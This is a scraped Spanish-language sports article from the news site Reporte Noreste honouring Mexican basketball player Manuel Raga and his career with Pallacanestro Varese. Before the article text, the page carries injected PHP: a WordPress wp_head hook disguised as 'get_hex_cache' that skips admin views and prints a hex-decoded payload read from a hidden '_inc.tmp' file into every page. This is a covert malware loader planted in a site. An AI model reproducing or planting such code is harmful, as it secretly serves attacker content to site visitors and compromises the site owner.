if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } Manuel Raga es un #OrgulloMexicano – Reporte Noreste
Conéctate con nosotros

Deportes

Manuel Raga es un #OrgulloMexicano

Manuel Raga es un #OrgulloMexicano

Nacido en la ciudad de Aldama, Tamaulipas es un jugador de baloncesto mexicano. Es uno de los jugadores históricos del Pallacanestro.

Raga tinene unas características ideales para el baloncesto, entre ellas un portentoso salto en vertical. Su capacidad de salto le servia para capturar muchos rebotes, a pesar de su altura, Pero sobre todo, le permitiria tener un tiro en suspensión (Jump Shot) que era su sello característico y eso lo hacia un tirador enormemente efiaz, y además, elegante.

Destacaría enseguida en el baloncesto mexicano, dónde asombrará con la Selección Mexicana en el campeonato mundial de 1967. En los Juegos Olímpicos de 1968 jugados en México de nueva cuenta destacaría.

Fue jugador del Pallacanestro Varese, conocido por su patrocinador IGNIS, en el equipo del ignis consigue 20 puntos por partido y en sus seis temporadas con el equipo gana 3 ligas italianas, 3 Copa de Italia, y a nivel Internacional, 3 Copas de Europa y 2 Copas Internacionales. Acabo su carrera de basquetbolista en Suiza en Lugano.

No llegó a jugar en la NBA, pero fue el primer jugador NO estadunidense en ser incluido en el draf de la NBA en 1970 con el número 197 (decima ronda)por los Atlanta Hawks.

En marzo del 2010, la provincia de Varese le rindió un homenaje a Raga, II Messicano Volante por haber sido parte esencial de la era legendaria del equipo ignis.

El presidente de la provincia Dario Galli nombro a Raga ciudadano distinguido por la provincia.

Manuel Raga, por su trayectoria deportiva, es un Orgullo Mexicano para todas y todos los deportistas de nuestro país.

Luis García.

Haga clic para comentar

Leave a Reply

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Facebook

Principales

Más en Deportes